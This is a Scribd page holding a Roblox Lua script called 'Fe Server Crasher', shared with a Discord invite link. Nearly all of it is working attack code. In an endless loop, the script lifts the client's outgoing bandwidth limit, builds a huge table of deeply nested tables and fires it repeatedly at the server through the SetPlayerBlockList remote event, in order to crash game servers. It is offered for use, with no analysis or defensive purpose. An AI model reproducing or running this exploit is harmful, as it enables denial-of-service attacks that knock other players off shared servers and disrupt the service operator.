0% found this document useful (0 votes)
283 views1 page

Fe Server Crasher

Uploaded by

deaththereaper94
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
283 views1 page

Fe Server Crasher

Uploaded by

deaththereaper94
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

-- https://discord.

gg/dVSFmJYDdS

while wait(0.6) do
game:GetService("NetworkClient"):SetOutgoingKBPSLimit(math.huge)
local function getmaxvalue(val)
local mainvalueifonetable = 499999
if type(val) ~= "number" then
return nil
end
local calculateperfectval = (mainvalueifonetable/(val+2))
return calculateperfectval
end

local function bomb(tableincrease, tries)


local maintable = {}
local spammedtable = {}

table.insert(spammedtable, {})
z = spammedtable[1]

for i = 1, tableincrease do
local tableins = {}
table.insert(z, tableins)
z = tableins
end

local calculatemax = getmaxvalue(tableincrease)


local maximum

if calculatemax then
maximum = calculatemax
else
maximum = 999999
end

for i = 1, maximum do
table.insert(maintable, spammedtable)
end

for i = 1, tries do
game.RobloxReplicatedStorage.SetPlayerBlockList:FireServer(maintable)
end
end

bomb(250, 2)
end

You might also like